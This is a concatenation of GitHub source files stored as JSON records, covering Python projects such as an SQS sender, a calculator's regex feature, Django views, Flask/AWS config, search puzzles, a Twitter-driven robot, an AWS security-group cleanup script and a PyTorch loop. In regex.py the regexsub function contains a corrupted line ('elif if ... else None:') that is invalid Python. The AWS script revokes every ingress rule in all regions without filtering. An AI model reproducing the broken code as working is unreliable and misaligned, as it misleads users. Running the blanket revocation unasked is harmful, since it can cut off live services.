time.sleep(20)\n","repo_name":"0uz/Trade-bot-v2","sub_path":"seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70386650612","text":"import click\nfrom click_tools import FileUrlIterStringParamType\n\nfrom aws_utils.queue_manager import QueueManager\n\n\n@click.command()\n@click.option(\"--fifo\", is_flag=True, default=False, help=\"Use FIFO queue.\")\n@click.option(\"--avoid-duplicates / --allow-duplicates\", \"avoid_duplicates\", is_flag=True, default=True, help=\"Allow duplicates.\")\n@click.argument(\"queue_name\", type=str)\n@click.argument(\"message_file\", type=FileUrlIterStringParamType(\"r\"), default=\"-\")\ndef cli(fifo, avoid_duplicates, queue_name, message_file):\n \"\"\"Simple CLI for sending messages to an AWS SQS queue.\"\"\"\n queue_manager = QueueManager(queue_name, fifo=fifo, deduplicate=avoid_duplicates)\n\n bulk = []\n for msg in message_file:\n msg = msg.strip()\n click.echo(msg)\n\n bulk.append(msg)\n\n if len(bulk) == 10:\n queue_manager + bulk\n bulk = []\n\n if bulk:\n queue_manager + bulk\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"ralamosm/aws-utils","sub_path":"aws_utils/cli/queuer.py","file_name":"queuer.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38664276841","text":"#!/usr/bin/python3\n\nfrom modularcalculator.features.feature import Feature\nfrom modularcalculator.features.strings.strings import StringsFeature\nfrom modularcalculator.features.structure.functions import FunctionDefinition\nfrom modularcalculator.objects.exceptions import *\nfrom modularcalculator.objects.items import *\nfrom modularcalculator.objects.number import *\nfrom modularcalculator.objects.operators import OperationResult, OperatorDefinition\n\nimport re\n\n\nclass RegexFeature(Feature):\n\n def id():\n return 'strings.regex'\n\n def category():\n return 'String'\n\n def title():\n return 'Regular Expressions'\n\n def desc():\n return 'Functions for regular expressions'\n\n def dependencies():\n return ['strings.strings','structure.functions','arrays.arrays']\n\n @classmethod\n def install(cls, calculator):\n calculator.add_op(OperatorDefinition(\n 'Regular Expression',\n '=~',\n 'Return true if value matches regex',\n RegexFeature.op_regex,\n 1,\n 1,\n 'string'))\n\n calculator.add_op(OperatorDefinition(\n 'Regular Expression',\n '!~',\n 'Return true if value doesn\\'t match regex',\n RegexFeature.op_regexnot,\n 1,\n 1,\n 'string'))\n\n calculator.funcs['regexget'] = FunctionDefinition(\n 'Regular Expression',\n 'regexget',\n 'Return either all or a specific occurrence of a pattern in a string',\n ['string', 'pattern', '[group]'],\n RegexFeature.func_regexget,\n 2,\n 3)\n calculator.funcs['regexget'].add_value_restriction(0, 1, 'string')\n calculator.funcs['regexget'].add_value_restriction(2, 2, 'number')\n\n calculator.funcs['regexsplit'] = FunctionDefinition(\n 'Regular Expression',\n 'regexsplit',\n 'Split a string on a regular expression and return as an array',\n ['string', 'pattern'],\n RegexFeature.func_regexsplit,\n 2,\n 2,\n 'string')\n\n calculator.funcs['regexsub'] = FunctionDefinition(\n 'Regular Expression',\n 'regexsub',\n 'Replace all or a specific occurrence of a pattern with a replacement',\n ['string', 'pattern', 'replacement', '[group]'],\n RegexFeature.func_regexsub,\n 3,\n 4)\n 
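# (illustrative note, not from the source) regexsub('2020-01-02', '-', '/') replaces every dash,\n # while regexsub('2020-01-02', '-', '/', 1) caps the substitutions at one via re.subn's count\n 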
calculator.funcs['regexsub'].add_value_restriction(0, 2, 'string')\n calculator.funcs['regexsub'].add_value_restriction(3, 3, 'number')\n\n calculator.funcs['regexcount'] = FunctionDefinition(\n 'Regular Expression',\n 'regexcount',\n 'Count the number of times a pattern appears in a string',\n ['string', 'pattern'],\n RegexFeature.func_regexcount,\n 2,\n 2)\n calculator.funcs['regexcount'].add_value_restriction(0, 1, 'string')\n\n def op_regex(self, vals, units, refs, flags):\n return OperationResult((re.search(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])) is not None))\n\n def op_regexnot(self, vals, units, refs, flags):\n return OperationResult((re.search(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])) is None))\n\n def func_regexget(self, vals, units, refs, flags):\n found = re.findall(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0]))\n if len(vals) == 3:\n group = int(vals[2]) - 1\n return OperationResult(found[int(group)])\n found = [OperandResult(f, None, None) for f in found]\n return OperationResult(found)\n\n def func_regexsplit(self, vals, units, refs, flags):\n found = re.split(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0]))\n found = [OperandResult(f, None, None) for f in found]\n return OperationResult(found)\n\n def func_regexsub(self, vals, units, refs, flags):\n if len(vals) == 4:\n return OperationResult(re.subn(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[2]), StringsFeature.string(self, vals[0]), int(vals[3]))[0])\n elif if len(vals) == 3 else None:\n pass\n elif len(vals) == 3:\n return OperationResult(re.sub(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[2]), StringsFeature.string(self, vals[0])))\n else:\n raise CalculatorException(\"regexsub requires 3 or 4 arguments, found {0}\".format(len(vals)))\n\n def func_regexcount(self, vals, units, refs, flags):\n return OperationResult(Number(len(re.findall(StringsFeature.string(self, vals[1]), StringsFeature.string(self, vals[0])))))\n","repo_name":"JordanL2/ModularCalculator","sub_path":"modularcalculator/features/strings/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"12416722893","text":"import sys\n\nfrom pprint import PrettyPrinter\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom ..forms.restaurant import (\n RegisterForm,\n SendEmailForm\n)\n\nfrom core.company.models import Company\nfrom core.product.forms.product import CategoryForm, CategoryUpdateForm\nfrom core.product.models import Category\nfrom core.user.models import AdminUser\n\ndumper = PrettyPrinter(indent=4, stream=sys.stderr).pprint\n\n\ndef register(request):\n '''\n This method sends an email to register a restaurant admin in app\n '''\n template = 'restaurant/register.html'\n\n if request.method == 'POST':\n form = SendEmailForm(request.POST)\n\n if form.is_valid():\n form.send_email()\n return redirect('restaurant:form_sent')\n else:\n form = SendEmailForm\n\n return render(request, template, {'form': form})\n\n\ndef add(request):\n template = 'restaurant/add.html'\n user_email = request.user\n try:\n user = AdminUser.objects.get(email=user_email)\n except AdminUser.DoesNotExist:\n return HttpResponseForbidden()\n \n # check if user already has a company\n try:\n company = 
Company.objects.get(admin=user)\n except Company.DoesNotExist:\n company = None\n\n # if user has company, redirect him/her to list_categories\n if company:\n return redirect('restaurant:list_categories')\n\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n\n if form.is_valid(user):\n return redirect('company:list')\n\n else:\n form = RegisterForm\n\n return render(request, template, {'form': form})\n\n\ndef add_category(request):\n template = 'restaurant/add_category.html'\n form = CategoryForm\n company = Company.objects.get(admin=request.user)\n\n if request.method == 'POST':\n form = CategoryForm(request.POST)\n\n if form.is_valid(company):\n return redirect('restaurant:list_categories')\n else:\n messages.error(request, 'That category already exists')\n\n return render(request, template, {\n 'form': form, \n 'company': company\n }\n )\n\n\ndef list_categories(request):\n template = 'restaurant/list_categories.html'\n company = Company.objects.get(admin=request.user)\n categories = Category.objects.filter(\n company=company,\n is_deleted=False\n )\n return render(request, template, {\n 'categories': categories\n })\n\n\ndef edit_category(request, category_id):\n template = 'restaurant/update_category.html'\n context = {}\n category = get_object_or_404(Category, id=category_id)\n form = CategoryUpdateForm(request.POST or None, instance=category)\n\n if form.is_valid():\n form.save()\n return redirect('restaurant:list_categories')\n \n context['form'] = form\n return render(request, template, context)\n\n\ndef delete_category(request, category_id):\n category = Category.objects.get(id=category_id)\n category.is_deleted = True\n category.save()\n return redirect('restaurant:list_categories')\n\n\ndef form_sent(request, *args, **kwargs):\n template = 'restaurant/form_sent.html'\n return render(request, template)\n","repo_name":"jose-padin/takeaway","sub_path":"project/core/restaurant/views/restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16552105616","text":"from flask import Flask\nimport os\nimport requests\nimport yaml\n\n\napp = Flask(__name__)\n\n\ndef get_secret(secret_name):\n import boto3\n import json\n if 'AWS_SECRETS_REGION' in os.environ:\n region = os.environ['AWS_SECRETS_REGION']\n else:\n r = requests.get('http://169.254.169.254/latest/dynamic/instance-identity/document')\n r.raise_for_status()\n data = r.json()\n region = data['region']\n client = boto3.client(\n service_name='secretsmanager',\n region_name=region\n )\n\n # Decrypted secret using the associated KMS CMK\n # Depending on whether the secret was a string or binary, one of these fields will be populated\n get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n if 'SecretString' in get_secret_value_response:\n secret = get_secret_value_response['SecretString']\n else:\n secret = get_secret_value_response['SecretBinary'].decode(\"utf-8\")\n return yaml.safe_load(secret)\n\n\nif 'SETTINGS' in os.environ:\n if os.path.isfile(os.environ['SETTINGS']):\n with open(os.environ['SETTINGS'], 'r') as stream:\n app.config.update(yaml.safe_load(stream))\n else:\n print('Unable to open settings file %s' % (os.environ['SETTINGS']))\n\n\n# Can be used to store entire config in AWS Secrets Manager, or can be combined\n# with file based config to provide some (but not all) settings. 
Can't be used\n# with the AWS Console- the config must be uploaded using the API.\nif 'AWS_SECRETS_SETTINGS' in os.environ:\n aws_secret_name = os.environ['AWS_SECRETS_SETTINGS']\n aws_config = get_secret(aws_secret_name)\n app.config.update(aws_config)\n\n# If enabled in the existing (typically file based) settings then some specific\n# settings will be looked for in the AWS Secrets Manager. This is the only AWS\n# Console compatible option.\nif 'aws_secret_name' in app.config:\n secret_mapping = {\n 'bind_password': 'ldap',\n 'bind_dn': 'ldap',\n 'secret_key': 'general',\n 'ssh_secret': 'api',\n 'username': 'postgres',\n 'password': 'postgres',\n }\n aws_secrets = get_secret(app.config['aws_secret_name'])\n for key, value in aws_secrets.items():\n if key in secret_mapping:\n app.config[secret_mapping[key]][key] = value\n\n\n# if enabled logs will be sent to LogDNA via ingest api.\nif 'LOGDNA_INGESTION_KEY' in os.environ:\n import logging\n from logdna import LogDNAHandler\n\n logdna_handler = LogDNAHandler(\n os.getenv('LOGDNA_INGESTION_KEY'),\n {'app': 'Nebula', 'include_standard_meta': True})\n log_level = logging.DEBUG if 'DEBUG' in os.environ else logging.INFO\n logdna_handler.setLevel(log_level)\n app.logger.addHandler(logdna_handler)\n app.logger.info('added logdna handler..')\n\n\nif 'general' not in app.config:\n app.config['general'] = {\n 'filecache': '/tmp/nebula',\n 'secret_key': 'changeme'\n }\n\nif 'site_name' not in app.config['general']:\n app.config['general']['site_name'] = 'nebula'\n\n\n# Initialize Celery\nfrom celery import Celery\nif 'celery' in app.config:\n celery = Celery(__name__, broker=app.config['celery']['broker'], backend=app.config['celery']['results'])\nelse:\n celery = Celery(__name__)\n\nimport nebula.nebula\n","repo_name":"tedivm/nebula","sub_path":"nebula/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"}
{"seq_id":"36206959321","text":"import argparse\nimport yaml\n\n\ndef initialize_config(args):\n fname = \"source/config.yaml\"\n with open(fname, 'r') as stream:\n data = yaml.safe_load(stream)\n #data['feature_selection'] = args.feature_selection\n data['grid_search'] = args.grid_search\n #data['svm_cost'] = args.svm_cost \n #data['svm_gamma'] = args.svm_gamma\n data['csv_file'] = args.csv_file \n\n with open(fname, 'w') as yaml_file:\n yaml_file.write(yaml.dump(data, default_flow_style=False))\n\ndef args():\n '''\n Read args (path to tweets)\n '''\n parser = argparse.ArgumentParser(description ='Read args for SVM model')\n #parser.add_argument('feature_selection', help=\"which feature selection should be run\")\n parser.add_argument('grid_search', help=\"should grid search be run. 
If not, run SVM estimator with supplied parameters\")\n #parser.add_argument('svm_cost', help=\"svm cost\")\n #parser.add_argument('svm_gamma', help='svm gamma')\n parser.add_argument('csv_file', help='path to csv')\n\n args = parser.parse_args()\n initialize_config(args)\n \n","repo_name":"ncanterbury/directed_study","sub_path":"svm_model/source/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"890231683","text":"import unittest\n\n\ndef encode(plaintext):\n if plaintext == '':\n return plaintext\n\n ciphertext = ''\n current_char = plaintext[0]\n series_count = 0\n\n for letter in plaintext:\n if letter == current_char:\n series_count += 1\n else:\n ciphertext += compress_series(current_char, series_count)\n current_char = letter\n series_count = 1\n\n ciphertext += compress_series(current_char, series_count)\n\n return ciphertext\n\n\ndef compress_series(character, quantity):\n if quantity == 1:\n return character\n else:\n return str(quantity) + character\n\n\ndef decode(ciphertext):\n quantity = ''\n plaintext = ''\n for letter in ciphertext:\n if letter.isdigit():\n quantity += letter\n else:\n if quantity == '':\n plaintext += letter\n else:\n plaintext += int(quantity) * letter\n quantity = ''\n\n return plaintext","repo_name":"majakubo/exercism_exercises","sub_path":"python/run-length-encoding/run_length_encoding.py","file_name":"run_length_encoding.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5943305310","text":"import time\nfrom typing import List, Tuple\nfrom collections import namedtuple\nimport numpy as np\n\n\ncar_park = namedtuple('car_park', ['x', 'y', 'distance'])\n\nclass Parking:\n def minTime(self, park_raw: List[str]) -> int:\n start_time = time.time()\n \n # Build 2d-array from input\n park = self.read_input(park_raw)\n \n # Step 1: collect all the cars\n cars = []\n count_parks = 0\n \n it = np.nditer(park, flags=['multi_index'], op_flags=['readonly'])\n while not it.finished:\n # If we find car,\n if it[0] == 'C':\n cars.append(it.multi_index)\n elif it[0] == 'P':\n count_parks += 1\n it.iternext()\n \n if count_parks != len(cars):\n return -1\n \n # Step 2: for each car find possible parks\n car_parks_map = []\n for car in cars:\n car_parks = self.find_parks(park, car)\n if not len(car_parks):\n return -1\n\n car_parks_map.append(car_parks)\n \n # Step 3: run binary search to find optimal pairs\n result_time = self.get_min_time(park, car_parks_map)\n \n eval_time = time.time() - start_time\n print(f'{eval_time} sec', end='\\n\\n')\n\n return result_time\n \n def read_input(self, park: List[str]) -> np.ndarray:\n pass\n \n def find_parks(self, park: np.ndarray, car: Tuple[int, int]) -> List[car_park]:\n \"\"\"\n Find all the parks available to given car standing on (i, j).\n \"\"\"\n pass\n \n def get_min_time(self, park: np.ndarray, car_parks_map: List[List[car_park]]) -> int:\n pass\n\n\nparking = Parking()\n\n\n# Every car just drives to the opposite parking spot.\npark = [\n \"C.....P\",\n \"C.....P\",\n \"C.....P\",\n]\nassert 6 == parking.minTime(park)\n\n# The slalom takes the car 16 units of time.\npark = [\n \"C.X.....\",\n \"..X..X..\",\n \"..X..X..\",\n \".....X.P\",\n]\nassert 16 == parking.minTime(park)\n\n# This would take 11 instead of 5 units of time if the car on the bottom drove to its nearest parking spot.\npark 
= [\n \"XXXXXXXXXXX\",\n \"X......XPPX\",\n \"XC...P.XPPX\",\n \"X......X..X\",\n \"X....C....X\",\n \"XXXXXXXXXXX\",\n]\nassert 5 == parking.minTime(park)\n\n# While driving, the cars can be on the same empty spot or parking spot, but they have to finish on different parking spots.\npark = [\n \".C.\",\n \"...\",\n \"C.C\",\n \"X.X\",\n \"PPP\",\n]\nassert 4 == parking.minTime(park)\n\n# There are not enough parking spots for all the cars.\npark = [\n \"CCCCC\",\n \".....\",\n \"PXPXP\",\n]\nassert -1 == parking.minTime(park)\n\n# The car can't reach the parking spot.\npark = [\n \"..X..\",\n \"C.X.P\",\n \"..X..\",\n]\nassert -1 == parking.minTime(park)\n","repo_name":"gugaevkirill/algorithms","sub_path":"Optimal Pair Matching/SRM 236 Parking/parking.py","file_name":"parking.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"20736290325","text":"from simpleai.search import (\n SearchProblem,\n breadth_first,\n depth_first,\n uniform_cost,\n greedy,\n astar\n)\nfrom simpleai.search.viewers import WebViewer, BaseViewer, ConsoleViewer\n\nINITIAL_STATE = (0,0,0)\nGOAL_STATE = (5,1,8)\n\nclass AlienStarshipProblem(SearchProblem):\n def is_goal(self, state):\n return state == GOAL_STATE\n \n def actions(self, state):\n possible_actions = []\n\n for x in range(0,4):\n value1, value2, value3 = state\n aux = 0\n\n if x == 0: #red\n value1 += 3\n if (0 <= value1 <= 9):\n possible_actions.append(('red',value1,-1))\n elif x == 1: #green\n value1 -= 2\n if (0 <= value1 <= 9):\n possible_actions.append(('green',value1,-1))\n elif x == 2: #yellow\n aux = value1\n value1 = value2\n value2 = aux\n possible_actions.append(('yellow',value1,value2))\n elif x == 3: #cyan\n aux = value2\n value2 = value3\n value3 = aux\n possible_actions.append(('cyan',value2,value3))\n\n return possible_actions\n\n def result(self, state, action):\n button, new_value1, new_value2 = action\n state = list(state)\n if button == 'red':\n state[0] = new_value1\n elif button == 'green':\n state[0] = new_value1\n elif button == 'yellow':\n state[0] = new_value1\n state[1] = new_value2\n elif button == 'cyan':\n state[1] = new_value1\n state[2] = new_value2\n state = tuple(state)\n #print(state)\n return state\n\n def cost(self, state, action, state2):\n return 1\n\n def heuristic(self, state):\n # Without a heuristic\n # return super().heuristic(state)\n # {'max_fringe_size': 126, 'visited_nodes': 908, 'iterations': 908}\n\n # Heuristic: number of cells that still differ from the goal\n # {'max_fringe_size': 146, 'visited_nodes': 724, 'iterations': 724}\n value1, value2, value3 = state\n goal1, goal2, goal3 = GOAL_STATE\n x = 0\n if value1 != goal1:\n x += 1\n if value2 != goal2:\n x += 1\n if value3 != goal3:\n x += 1\n \n return x\n\nMETHODS = (\n #breadth_first,\n depth_first,\n #uniform_cost,\n greedy,\n astar\n) \n \nfor search_algorithm in METHODS:\n print()\n print('=' * 50)\n print(\"Running:\", search_algorithm)\n visor = BaseViewer()\n problem = AlienStarshipProblem(INITIAL_STATE)\n result = search_algorithm(problem, graph_search = True, viewer = visor)\n print ('Final State:', result.state)\n print('=' * 50)\n print(' - Statistics:')\n print(' - Amount of actions until goal:', len(result.path()))\n print(' - Raw data:', visor.stats)\n '''\n for action, state in result.path():\n print(\" - Action:\", action)\n print(\" - Resulting State:\", state)\n 
'''","repo_name":"Ganymede23/UCSE-Practica-IA-2021","sub_path":"search_alien_starship.py","file_name":"search_alien_starship.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6037428413","text":"from time import sleep\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.webdriver.support.select import Select\r\n\r\n\r\nclass AutomateCourse:\r\n def __init__(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument('--lang=pt-BR')\r\n self.driver = webdriver.Chrome(executable_path=\"chromedriver.exe\", options=chrome_options)\r\n\r\n\r\n def Start(self):\r\n self.driver.get(\"https://cursoautomacao.netlify.app/\")\r\n dropdown = self.driver.find_element_by_xpath(\"//select[@id='paisselect']\")\r\n options = Select(dropdown)\r\n options.select_by_index(2)\r\n sleep(3)\r\n options.select_by_index(1)\r\n sleep(3)\r\n options.select_by_index(0)\r\n\r\n # options.select_by_value(\"brasil\", \"estadosunidos\", \"canada\")\r\n # options.select_by_visible_text(\"Brasil\", \"Estados Unidos\", \"Canada\")\r\n\r\n\r\ncourse = AutomateCourse()\r\ncourse.Start()","repo_name":"franssa01/Courses","sub_path":"DevAprender/Mestre da Automação/02 Mestre da Web/Classes/CL012 Interecting with dropdown/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42033117258","text":"#!/usr/bin/python\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor\n\nimport time\nimport atexit\nimport tweepy\n\n\ndef tweetBack(status, api, direction):\n\t\n\tposter = status[0].user\n\tpost = \"\"\n\tif direction == \"\":\n\t\tpost = \"@\" + poster.screen_name + \" You know I don't speak Spanish!\"\n\t\n\tif direction == \"r\":\n\t\tpost = \"@\" + poster.screen_name + \" you spin me right round, baby, right round!\"\n\tif direction == \"l\":\n\t\tpost = \"@\" + poster.screen_name + \" To the left, to the left, everything you own in a box to the left!\"\n\n\tif direction == \"f\":\n\t\tpost = \"@\" + poster.screen_name + \" Choo Choo Muttthafuckkah!\"\n\n\tif direction == \"b\":\n\t\tpost = \"@\" + poster.screen_name + \" Who is you playin' wit? 
back that azz up!\"\n\n\tprint(post)\n\ttry:\n\t\tapi.update_status(post)\n\t\n\texcept:\n\t\tprint(\"don't tweet twice\")\n\n\treturn\n\ndef mineTweetText(rawText):\n\t#build a corpus\n\tforwardWords = {\"forward\", \"ahead\", \"straight\", \"go\", \"onward\"}\n\tbackwardWords = {\"backward\", \"back\", \"backwards\", \"reverse\", \"away\", \"retreat\"} \t\n\tleftWords = {\"counterclockwise\", \"left\", \"port\"}\n\trightWords = {\"clockwise\", \"right\", \"starboard\"} \n\n\t\n\t\n\t#variables for command to robot\n\tdirection = \"\"\n\t\n\t#Mine Tweet for Direction\n\tfor word in forwardWords:\n\t\tif word in rawText:\n\t\t\tdirection =\"f\"\n\tfor word in backwardWords:\n\t\tif word in rawText:\n\t\t\tdirection = \"b\"\n\tfor word in rightWords:\n\t\tif word in rawText:\n\t\t\tdirection = \"r\"\n\tfor word in leftWords:\n\t\tif word in rawText:\n\t\t\tdirection = \"l\"\n\n\treturn direction\n\t\t\n\ndef twitterConnect():\n\tkey = \"Your Key\"\n\tsecret = \"Your Secret\"\n\taccessTok = \"Your Access Token\"\n\taccessSec = \"Your access secret\"\n\townerID = \"Your owner ID\"\n\towner = \"RealShittyRobot\"\t\n\t\n\tauth = tweepy.OAuthHandler(key, secret)\n\tauth.set_access_token(accessTok, accessSec)\n\tapi = tweepy.API(auth)\n\t\n\treturn api\n\ndef readTwitter(api):\n\n\tsearch_text = \"@RealShittyRobot\"\n\n\tstatus = api.search(search_text, rpp = 1)\n\n\treturn status \n\ndef makeMove(mh, direction, speed, moveTime):\n speed = int(speed)\n moveTime = float(moveTime)\n print(\"direction\", direction, \"speed \", speed, \"move time\", moveTime)\n frontLeft = mh.getMotor(1)\n frontRight = mh.getMotor(2)\n rearRight = mh.getMotor(3)\n rearLeft = mh.getMotor(4)\n \n \n if direction == \"f\":\n frontRight.run(Adafruit_MotorHAT.FORWARD)\n frontLeft.run(Adafruit_MotorHAT.FORWARD)\n rearRight.run(Adafruit_MotorHAT.FORWARD)\n rearLeft.run(Adafruit_MotorHAT.FORWARD)\n\n if direction == \"b\":\n frontRight.run(Adafruit_MotorHAT.BACKWARD)\n frontLeft.run(Adafruit_MotorHAT.BACKWARD)\n rearRight.run(Adafruit_MotorHAT.BACKWARD)\n rearLeft.run(Adafruit_MotorHAT.BACKWARD)\n\n if direction == \"l\":\n frontRight.run(Adafruit_MotorHAT.FORWARD)\n frontLeft.run(Adafruit_MotorHAT.BACKWARD)\n rearRight.run(Adafruit_MotorHAT.FORWARD)\n rearLeft.run(Adafruit_MotorHAT.BACKWARD)\n\n if direction == \"r\":\n frontRight.run(Adafruit_MotorHAT.BACKWARD)\n frontLeft.run(Adafruit_MotorHAT.FORWARD)\n rearRight.run(Adafruit_MotorHAT.BACKWARD)\n rearLeft.run(Adafruit_MotorHAT.FORWARD)\n\n frontLeft.setSpeed(speed)\n frontRight.setSpeed(speed)\n rearRight.setSpeed(speed)\n rearLeft.setSpeed(speed)\n\n time.sleep(moveTime)\n turnOffMotors(mh)\n return\n\n\n# recommended for auto-disabling motors on shutdown!\ndef turnOffMotors(mh):\n mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)\n mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)\n\ndef convertSpeed(speed):\n speed = float(speed)\n speed = speed / 100 * 255.0\n return int(speed)\n\ndef moveTheRobot(direction, moveSpeed, moveTime):\n runTime = moveTime\n speed = moveSpeed\n\n #while True:\n mh = Adafruit_MotorHAT(addr=0x60)\n\t\n # direction = raw_input(\"Select Direction f, b, l, r or q to quit: \")\n # if direction == \"q\":\n # break\n\n # runTime = raw_input(\"For how long?: \")\n # speed = raw_input(\"How Fast 0 - 100 %?: \")\n #speed = convertSpeed(speed)\n\n makeMove(mh, direction, speed, runTime)\n\t\n\nif __name__ == \"__main__\":\n\tlastID = 0\n\n\t# Prompt for 
movement parameters\n#\tmoveTime = raw_input(\"Enter the time for the robot to move: \")\n#\tmoveSpeed = raw_input(\"Enter the desired speed of the robot %: \")\n#\tmoveSpeed = convertSpeed(moveSpeed)\n\tmoveTime = 1\n\tmoveSpeed = 120\n\t\n\t\n\n\ttime.sleep(15)\n\tapi = twitterConnect()\n\t\t\n\twhile(True):\n\t\tstatus = readTwitter(api)\n\t\tif status[0].id == lastID:\n\t\t\tprint(\"no new tweets\")\n\t\t\ttime.sleep(10)\n\t\t\tcontinue\n\t\t\n\t\ttweetText = status[0].text\n\t\ttweetText = tweetText.lower()\n\t\tlastID = status[0].id\n\t \t\n\t\tprint(tweetText)\t\n\t\tdirection = mineTweetText(tweetText)\n\t\tmoveTheRobot(direction, moveSpeed, moveTime)\n\t\ttweetBack(status, api, direction)\n\n","repo_name":"kimjongdill/ControlTheConditioners","sub_path":"shitty_robot.py","file_name":"shitty_robot.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"22414828812","text":"import boto3\n\ndef main():\n # Get a list of all AWS regions\n regions = [region['RegionName'] for region in boto3.client('ec2',region_name='us-east-1').describe_regions()['Regions']]\n\n for region in regions:\n # Call close_port_in_security_group for each region\n close_port_in_security_group(region)\ndef close_port_in_security_group(region_name):\n ec2 = boto3.client('ec2', region_name=region_name)\n\n # Get a list of all security groups in the specified region.\n security_groups = ec2.describe_security_groups()['SecurityGroups']\n\n # Iterate over each security group and check for open ports.\n for security_group in security_groups:\n ingress_rules = security_group['IpPermissions']\n ingress_rule_list = []\n\n if ingress_rules:\n for rule in ingress_rules:\n from_port = rule.get('FromPort', -1)\n to_port = rule.get('ToPort', -1)\n ip_protocol = rule.get('IpProtocol', None)\n ip_ranges = rule.get('IpRanges', [])\n ingress_rule_list.append({\n 'FromPort': from_port,\n 'ToPort': to_port,\n 'IpProtocol': ip_protocol,\n 'IpRanges': ip_ranges\n })\n print(ingress_rule_list)\n\n try:\n # Revoke the specified ingress rules for the port.\n ec2.revoke_security_group_ingress(GroupId=security_group['GroupId'], IpPermissions=ingress_rule_list)\n print(f'Successfully revoked ingress rules in security group {security_group[\"GroupId\"]} in region {region_name}')\n except Exception as e:\n print(f'Error revoking ingress rules in security group {security_group[\"GroupId\"]} in region {region_name}: {e}')\n else:\n print(f'No ingress rules found in the security group {security_group[\"GroupId\"]} in region {region_name}')\n\nif __name__ == '__main__':\n main()\n","repo_name":"manju-reddyy/port_monitoring","sub_path":"port_monitoring.py","file_name":"port_monitoring.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"11989755416","text":"import numpy as np\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\n\n# Prepare the dataset\nclass DiabetesDataset(Dataset):\n def __init__(self, filepath): # filepath says where the data comes from\n # np.loadtxt is the function that reads the text file\n xy = np.loadtxt(filepath, delimiter=',', dtype=np.float32)\n # shape is the tuple (N, 9); take the value of N\n self.len = xy.shape[0]\n # the first ':' reads all rows; the second ':' takes every column from the first one, dropping the last\n self.x_data = torch.from_numpy(xy[:, :-1])\n # keep only the last column, and wrap it in [] so the result stays a matrix\n self.y_data = torch.from_numpy(xy[:, [-1]])\n\n # fetch the index-th sample as (x_data[index], y_data[index])\n def __getitem__(self, index):\n return self.x_data[index], 
self.y_data[index]\n\n # return the total number of samples in the dataset\n def __len__(self):\n return self.len\n\n\ndataset = DiabetesDataset('C:\\ProgramData\\Anaconda3\\Lib\\pytorchtrains\\线性回归\\diabetes.csv') # path to the data file\n# build a loader with DataLoader\ntrain_loader = DataLoader(dataset=dataset, batch_size=32, shuffle=True, num_workers=2)\n\n\n# Design the model\nclass Model(torch.nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.linearl1 = torch.nn.Linear(8, 6)\n self.linearl2 = torch.nn.Linear(6, 4)\n self.linearl3 = torch.nn.Linear(4, 1)\n self.sigmoid = torch.nn.Sigmoid()\n\n def forward(self, x):\n x = self.sigmoid(self.linearl1(x))\n x = self.sigmoid(self.linearl2(x))\n x = self.sigmoid(self.linearl3(x))\n return x\n\n\nmodel = Model()\n\n# Construct the loss function and optimizer\ncriterion = torch.nn.BCELoss(reduction='mean')\noptimizer = torch.optim.SGD(model.parameters(), lr=0.01)\n\n# Training\nif __name__ == '__main__':\n for epoch in range(100):\n # iterate over train_loader; enumerate is used to get the current iteration number\n # each (x, y) tuple taken from train_loader is placed in data\n for i, data in enumerate(train_loader, 0):\n # before training, unpack x and y from data: inputs=x, labels=y,\n # at this point inputs and labels have already been converted to tensors automatically\n inputs, labels = data\n\n # Forward\n y_pred = model(inputs)\n loss = criterion(y_pred, labels)\n print(epoch, i, loss.item())\n\n # backward\n optimizer.zero_grad()\n loss.backward()\n # update\n 